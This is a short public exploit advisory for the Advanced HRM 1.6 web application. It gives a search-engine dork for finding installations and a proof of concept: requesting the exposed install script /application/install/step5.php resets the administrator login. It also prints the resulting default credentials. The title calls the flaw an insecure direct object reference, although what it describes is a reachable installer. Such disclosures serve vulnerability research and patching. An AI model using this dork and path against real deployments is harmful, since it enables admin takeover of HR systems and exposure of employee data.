Advanced HRM 1.6 Insecure Direct Object Reference

====================================================================================================================================| # Title     : Advanced HRM v1.6 Reset admin login Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 62.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/advanced-hrm/17767006                                                                  |  | # Dork      : "Copyright © CoderPixel 2016 All Rights Reserved"                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] The Vulnerability revolves around resetting script settings and reformulating a new password for the admin .[+] use payload : /application/install/step5.php[+] http://127.0.0.1/appchain.commy/hrm/application/install/step5.php[+] Congratulations!    You have just install Advance HRM!    To Login Admin Portal:    Use this link - http://127.0.0.1/appchain.commy/hrm/    Username: admin    Password: admin.passwordGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |=======================================================================================================================================